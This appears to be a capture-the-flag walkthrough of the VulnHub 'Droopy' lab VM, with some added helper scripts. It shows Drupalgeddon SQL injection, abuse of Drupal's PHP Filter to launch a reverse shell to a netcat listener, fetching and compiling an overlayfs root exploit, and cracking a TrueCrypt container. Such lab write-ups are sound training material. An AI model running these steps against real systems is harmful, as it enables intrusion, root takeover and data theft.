To get started, visit the Droopy v0.2 VulnHub page and download a copy of the VM.

The only 2 hints you’ll get are:

1.) Grab a copy of the rockyou wordlist.
2.) It’s fun to read other people’s email.

Special thanks go out to knightmare for all their work on this VM

Now first things first – start up the Droopy VM and if all goes to plan it should pick up a local IP from your DHCP server. In my case this will be in the 192.168.1.0/24 range.

There are lots of different methods to scan your network and pick up hosts. Some are better than others as far as stealth goes, but in my case I stuck to the reliable Swiss army knife nmap and just did a basic ping scan.

Right, now that we know our target, what to do next? Enumerate of course! Back to nmap, and we can do a quick check of what ports are open and what services are running on this specific host. Again there are lots of options, and it's always good to read all the walkthroughs to get an insight into how others approach each hurdle.
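The two nmap passes above, plus a small parser for nmap's grepable (-oG) output so the live host and its open ports can be pulled out of a saved scan rather than read off a screenshot. This is an added example and not part of the original post; the sample scan files are constructed to resemble a scan of 192.168.1.82, and the service banners in them are assumptions, not the VM's real ones.

```shell
#!/bin/sh
# Added example, not part of the original post: the two nmap passes used in
# the walkthrough plus a parser for nmap's grepable (-oG) output. The sample
# scan files are constructed; the banners are assumptions.

# The scans themselves, run from the attacking box (not executed here):
#   nmap -sn 192.168.1.0/24 -oG sweep.gnmap           # ping sweep of the LAN
#   nmap -sV -sC -p- 192.168.1.82 -oG target.gnmap    # all TCP ports, versions, default scripts

# live_hosts FILE: IPs reported Up in a ping-sweep -oG file.
live_hosts() {
    awk '/^Host:/ && /Status: Up/ { print $2 }' "$1"
}

# open_ports FILE: one "ip port/proto service version" line per open port.
# -oG "Ports:" entries are comma-separated and each looks like
# port/state/proto/owner/service/rpcinfo/version/ so split on "/".
open_ports() {
    awk -F'\t' '/^Host:/ && /Ports:/ {
        split($1, h, " "); ip = h[2]
        sub(/^Ports: /, "", $2); n = split($2, p, ", ")
        for (i = 1; i <= n; i++) {
            split(p[i], f, "/")
            if (f[2] == "open") printf "%s %s/%s %s %s\n", ip, f[1], f[3], f[5], f[7]
        }
    }' "$1"
}

# Constructed sample output (tab-separated fields, as nmap writes them).
SWEEP="${TMPDIR:-/tmp}/sweep.$$.gnmap"
TARGET="${TMPDIR:-/tmp}/target.$$.gnmap"
{
    printf '# Nmap 7.80 scan initiated (constructed sample)\n'
    printf 'Host: 192.168.1.1 ()\tStatus: Up\n'
    printf 'Host: 192.168.1.82 ()\tStatus: Up\n'
    printf '# Nmap done (constructed sample)\n'
} > "$SWEEP"
{
    printf '# Nmap 7.80 scan initiated (constructed sample)\n'
    printf 'Host: 192.168.1.82 ()\tStatus: Up\n'
    printf 'Host: 192.168.1.82 ()\tPorts: 22/open/tcp//ssh//OpenSSH 6.6.1p1/, 80/open/tcp//http//Apache httpd 2.4.7/, 111/filtered/tcp//rpcbind///\tIgnored State: closed (65532)\n'
    printf '# Nmap done (constructed sample)\n'
} > "$TARGET"

echo "live hosts:";  live_hosts "$SWEEP"
echo "open ports:";  open_ports "$TARGET"
```

Only ports whose state field is exactly "open" are printed, so "filtered" and "open|filtered" entries are left out of the list you act on; drop that check if you want to see them.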

Given that port 80 is open, a quick look at http://192.168.1.82 shows us a logon page. Reviewing our nmap enumeration, we see a file called CHANGELOG.txt which could be interesting, and after a quick review we can reasonably assume that the web server is running “Drupal 7.30, 2014-07-24”. Version files like this are worth grabbing early: the exact version string is what the rest of the exploit research hangs on.

NOTE – It's worth a mention that I did try brute forcing the logon at this point with no success – within a minute my IP was locked out. I'm not sure how long for as I just reverted the VM and went back to work.

So this is good. We have a definite starting point in which to base our attack. Now comes the essential part – more research.

A quick search on https://exploit-db.com for Drupal 7 reveals a potential SQL injection vector. Drupal 7.30 predates 7.32, the release that fixed the pre-authentication SQL injection in the database abstraction API (CVE-2014-3704, widely known as Drupalgeddon), and the public exploit for it uses the injection to insert a new user row, which is why the next step lands you an account. Let's give it a try.

If all goes well, we should now have a new Drupal account on the server and receive confirmation similar to the screenshot below.

So where to next? At this point it's a good idea to reward yourself with a cold beer, but don't get too carried away, this journey has only just begun. Next step is to log on with our newly created magical credentials and see what our options may be. In my case I have never used Drupal before so it's a good time to explore and get used to the lay of the land.

After a bit of casual strolling through the various settings I noticed a module called ‘PHP Filter’. The description reads ‘Allows embedded PHP code/snippets to be evaluated’. I'm pretty new to this, but that doesn't sound like a good thing. It isn't: with the module enabled, any account granted permission to use the ‘PHP code’ text format can put arbitrary PHP into a post and have the web server evaluate it, which is code execution as the web server user by design.

I enabled the PHP filter, saved the configuration and then gave my newly created account rights through the permissions link, making sure to click Save Permissions before I continued. Then I created a new post, setting the text format to PHP code and pasting in the reverse shell code from http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Remember to change the following settings on lines 49 and 50 of this particular reverse shell to your attacking machine's IP and to the port your listener will be on (4747 in the listener below):

$ip = '127.0.0.1'; // CHANGE THIS
$port = 1234; // CHANGE THIS

Then set up a netcat listener on your attacking machine with

# nc -nlvp 4747

Now fingers crossed, post or preview your update, making sure to set the Text Format type to ‘PHP code’, and if the code is good you should see the following connection back to your attacking machine – we have a shell! It's okay in this scenario, but keep in mind outbound firewalling (aka egress filtering), as this may prevent your reverse shell connection from reaching you. Pick a port that's allowed through the firewall where possible; 80 or 443 are the usual candidates, since outbound web traffic is rarely blocked.

I'll do a separate post of Linux post exploitation commands, but in this case we'll do a quick check of our current account with the id command

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

In this case I can see that the user name of the owner of the current session is www-data. And while I’m here I do a quick check of the kernel, hardware, etc with

$ uname -a

So this is good isn’t it? We have a shell on the target machine, but we need more! We need to escalate our privileges and make sure we’re at the sharp end of the stick. So where do we go from here?

Before continuing I did a quick browse through the system, and based on the original VM clue “It's fun to read other people's email” the /var/mail/ directory caught my attention. So I took a quick peek at the file it contained and made some notes

$ ls /var/mail
$ cat /var/mail/www-data

The two observations that I took away from it were:

1.) The password isn't longer than 11 characters
2.) We know what academy we went to

Based on this I decided to create a custom wordlist from any entries containing the word ‘academy’ BUT I screwed up and didn’t notice my mistake… I basically ran the following

$ cat rockyou.txt |grep acadamy >> daves_rockyou.txt

And that was my downfall. A serious lack of attention to detail, and that's always going to be your (my) downfall in this game. Long story short, when it came time to try and brute force the TrueCrypt container, it failed. My custom wordlist was based on ‘acadamy’ and what I should have typed was ‘academy’ – so there's a lesson learnt there. But anyway, back to the here and now – I have some clues to work with from the email message in www-data but I'm still not root, so let's move this along.

I needed to get back on track and get my bearings. First step for me is to check what the target is running and obtain the kernel version.

$ uname -r
3.13.0-43-generic

The resulting output in this case breaks down as follows:

3.13.0 – the upstream kernel version: major 3, minor 13, patch level 0
43 – the Ubuntu package (ABI) revision, i.e. which Ubuntu update of that kernel is installed
generic – the kernel flavour

Exploit-db entries are indexed on the upstream version, so 3.13.0 is the part to search for. The 43 still matters: Ubuntu backports security fixes without changing the upstream number, so a later package revision can already carry the fix for an exploit that the upstream version appears to match.

To establish what distro is running on the target machine I ran the following

$ cat /etc/issue
Ubuntu 14.04.1 LTS \n \l

(/etc/issue is a free-form login banner that admins sometimes edit; /etc/os-release or lsb_release -a is the more reliable check if the two disagree.)

A quick search on www.exploit-db.com turns up a few options to explore, but the one chosen this time is the overlayfs local root exploit (EDB-ID 37292, CVE-2015-1328), listed for Linux kernel 3.13.0 up to but not including 3.19 on Ubuntu 12.04 through 15.04, which covers our 3.13.0-43-generic. Full details and code are at https://www.exploit-db.com/exploits/37292/

Next I right click and copy the source link to download the exploit, then on the target machine run the following (the first attempt failed due to lack of permission to write; I changed into the /tmp directory and re-ran it, much better). Then I used gcc (GNU Compiler Collection) to compile the source code for execution.
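A version check to run before spending time on the exploit, with the download-and-build steps from the paragraph above wrapped as a function. This is an added example, not the author's exact commands: the range 3.13.0 to 3.19 is taken from the exploit-db listing for 37292, the raw download URL pattern https://www.exploit-db.com/raw/37292 is an assumption, and gcc is assumed to be present on the target (the post compiled there). A distro kernel can carry a backported fix, so a version match is a reason to try, not proof that the exploit will work.

```shell
#!/bin/sh
# Added example, not from the original post: check that the target kernel
# falls inside the range EDB-ID 37292 advertises (3.13.0 <= kernel < 3.19)
# before downloading and compiling anything. Assumptions: the raw exploit
# URL pattern https://www.exploit-db.com/raw/37292, gcc on the target, and
# a writable /tmp. A distro kernel may carry a backported fix, so a match
# is a hint, not proof.

# kernel_in_range RELEASE LOW HIGH: RELEASE is `uname -r` output such as
# 3.13.0-43-generic; only the upstream part before the first "-" is
# compared, numerically, as major.minor.patch. Returns 0 if LOW <= RELEASE < HIGH.
kernel_in_range() {
    upstream="${1%%-*}"
    awk -v r="$upstream" -v lo="$2" -v hi="$3" 'BEGIN {
        split(r, a, "."); split(lo, l, "."); split(hi, h, ".")
        rv = a[1] * 1000000 + a[2] * 1000 + a[3]
        lv = l[1] * 1000000 + l[2] * 1000 + l[3]
        hv = h[1] * 1000000 + h[2] * 1000 + h[3]
        exit !(rv >= lv && rv < hv)
    }'
}

# build_overlayfs_exploit: the post's download/compile/run steps as one
# function. /var/www/html is not writable by www-data, hence /tmp. Not
# executed by this script; call it by hand on the target.
build_overlayfs_exploit() {
    cd /tmp || return 1
    wget -q -O ofs.c https://www.exploit-db.com/raw/37292 || return 1   # assumed URL
    gcc ofs.c -o ofs || return 1
    ./ofs   # drops to a root shell when it works
}

if kernel_in_range "$(uname -r)" 3.13.0 3.19.0; then
    echo "$(uname -r): inside the range EDB 37292 claims, worth a try"
else
    echo "$(uname -r): outside that range, look for another candidate"
fi
```

If gcc is missing on the target, compile on a box with a matching kernel and libc and copy the binary over instead; the overlayfs bug is in the kernel, so the binary does not have to be built on the victim.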

Bingo – that’s what we needed. We now have root on the target machine, but this roller coaster’s still moving so there’s no time to celebrate just yet. There’s more work to be done.

A quick peek in the /root folder shows a lonesome file called dave.tc, and a quick google shows this to be a TrueCrypt virtual encrypted disk (container), so I decide to download it to my Kali box for further analysis. To do this I chose to move it into a web accessible directory and then just download it straight from a browser. Note, I should have used cp (copy) instead of mv (move) to avoid ‘detection’.

# mv dave.tc /var/www/html/dave.tc

Then in a browser I opened http://192.168.1.82/dave.tc to download the file

Now on my Kali box and feeling exceedingly confident I ran TrueCrack (a bruteforce password cracker for Truecrypt volumes) against the dave.tc container using my previously created custom wordlist.

# truecrack -t dave.tc -k sha512 -w daves_rockyou.txt

And you guessed it. It failed. Oh dear. At this point I should have checked and picked up on the spelling mistake, but I didn't. So, confused but not defeated, I moved on to the other clue, that the password wasn't longer than 11 characters. I had another crack at it, this time generating a new list which only contained passwords 11 characters long to minimise processing time, and crossed my fingers.

My own fault but I had to leave this to run overnight – yeah I’ve got a slow machine, but when I woke up in the morning with a fresh cup of coffee in hand, the password was smiling sweetly back at me – etonacademy
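The two clues from the mail turned into a wordlist filter, plus the sanity check that would have caught the ‘acadamy’ typo before the overnight run. This is an added example and not the author's commands; the sample list is constructed to stand in for rockyou.txt, and the file names are assumptions.

```shell
#!/bin/sh
# Added example, not from the original post: turn the two clues from the
# mail (the password contains "academy" and is at most 11 characters) into a
# targeted wordlist, then sanity-check that list before handing it to an
# overnight truecrack run. The sample list below is constructed to stand in
# for rockyou.txt; on a real run pass the path to rockyou.txt instead.

# filter_wordlist WORDLIST NEEDLE MAXLEN
# Prints the candidates that contain NEEDLE (case-insensitive) and are no
# longer than MAXLEN characters.
filter_wordlist() {
    grep -i -- "$2" "$1" | awk -v max="$3" 'length($0) <= max'
}

# check_wordlist FILE CLUE
# Refuses an empty list, and refuses one in which any line fails to contain
# CLUE. Type CLUE again from the mail rather than copying the needle used
# above: if the two differ, the filter was built on a typo, which is exactly
# the mistake that cost a night in the post.
check_wordlist() {
    [ -s "$1" ] || { echo "empty wordlist: check the filter" >&2; return 1; }
    if grep -qiv -- "$2" "$1"; then
        echo "wordlist has entries without '$2': wrong needle?" >&2
        return 1
    fi
    echo "$(wc -l < "$1" | tr -d ' ') candidates in $1"
}

# Constructed sample standing in for rockyou.txt.
SAMPLE="${TMPDIR:-/tmp}/sample_rockyou.$$"
cat > "$SAMPLE" <<'EOF'
password
academy
etonacademy
ACADEMYstudent
acadamy2001
stacademylongerthan11
eton
EOF

OUT="${TMPDIR:-/tmp}/daves_rockyou.$$"
filter_wordlist "$SAMPLE" academy 11 > "$OUT"
check_wordlist "$OUT" academy && cat "$OUT"
# With the real list: truecrack -t dave.tc -k sha512 -w "$OUT"
```

Filtering on "no longer than 11" rather than "exactly 11" keeps the shorter candidates the clue still allows; on the sample above the list shrinks to two entries, and with the misspelt needle the check fails instead of silently producing a list of the wrong words.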

Now we have the password for the TrueCrypt container we need to mount it and see what we can find.

Now this is where I have to apologise: the following steps worked for me, but being new to Linux I'm not sure this is the best way. I'll look more into it, but from here I made a new directory called /mnt/dave (the same name I gave in the cryptsetup process) in which to mount the volume, then ran the mount command.

First glance returns very little: three directories listed and two small images that don't seem suspicious (just yet), so before I waste too much time on steganography I'll do some more digging.

Ahh. So I was just running ls -a in the /mnt/dave/buller folder with no luck, then I ran it back in the /mnt/dave folder and just found a hair in my milkshake! Something I should have checked the first time around (mental note for future).

So this is interesting and unexpected, we have a new folder called .secret, so let's do some more digging. You won't catch me out twice. This time I did another ls -la and there are two folders, one of them hidden again.

BOOM! It's party pizza time. I was just about to start grabbing all the images out of this encrypted volume in preparation for further analysis, but there was no need, and I won't upload them here. I just took a look inside the /mnt/dave/.secret/.top folder and what do you know – flag.txt
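The mount step the post leaves to a screenshot, and a listing of hidden paths that would have found .secret/.top on the first pass. This is an added example, not the author's exact commands: it assumes cryptsetup 1.6 or later (which understands TrueCrypt containers through --type tcrypt) and root on the analysis box, the mapping name "dave" (the only name the post gives) and the mount point /mnt/dave. The privileged steps go through a run() wrapper that prints instead of executing while DRYRUN is set, so the script can be read and checked without a real container; the directory tree it lists is constructed to mirror the layout described above.

```shell
#!/bin/sh
# Added example, not the author's exact commands: open a TrueCrypt container
# with cryptsetup's tcrypt mode, mount it read-only, and list every hidden
# path under the mount. Assumptions: cryptsetup >= 1.6 and root on the
# analysis box, mapping name "dave", mount point /mnt/dave. With DRYRUN set
# the privileged commands are printed, not executed; remove the DRYRUN=1
# line below to run them for real.

run() { if [ -n "${DRYRUN:-}" ]; then echo "$*"; else "$@"; fi; }

# mount_tc CONTAINER NAME MOUNTPOINT: cryptsetup prompts for the passphrase
# and tries the TrueCrypt hash/cipher combinations itself, so no -k guess
# is needed here as it was for truecrack.
mount_tc() {
    run mkdir -p "$3"
    run cryptsetup open --type tcrypt "$1" "$2"
    run mount -o ro "/dev/mapper/$2" "$3"
}

# umount_tc NAME MOUNTPOINT: undo mount_tc.
umount_tc() {
    run umount "$2"
    run cryptsetup close "$1"
}

# list_hidden DIR: every path below DIR with a dot-named component, which a
# plain "ls" (without -a) in each directory would not show. Paths are
# printed relative to DIR.
list_hidden() {
    ( cd "$1" && find . -path '*/.*' | sort )
}

# Constructed stand-in for the mounted volume, mirroring the layout the post
# describes: a visible folder with an image, and .secret/.top/flag.txt.
DEMO="${TMPDIR:-/tmp}/dave_demo.$$"
mkdir -p "$DEMO/buller" "$DEMO/.secret/.top"
: > "$DEMO/buller/photo1.jpg"
: > "$DEMO/.secret/.top/flag.txt"

DRYRUN=1
echo "commands that would run against a real container:"
mount_tc dave.tc dave /mnt/dave
echo "hidden paths under $DEMO:"
list_hidden "$DEMO"
```

If the container turns out to hold a hidden volume as well, cryptsetup accepts --tcrypt-hidden alongside --type tcrypt to open that one instead; mounting read-only keeps the evidence unchanged while you look.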

Well that feels good. Big shout out to the boys and girls at www.top-hat-sec.com – if you ever want to learn from passionate like-minded people, this is the place to be. No rest for the wicked, time for a quick beer then on to the next VM.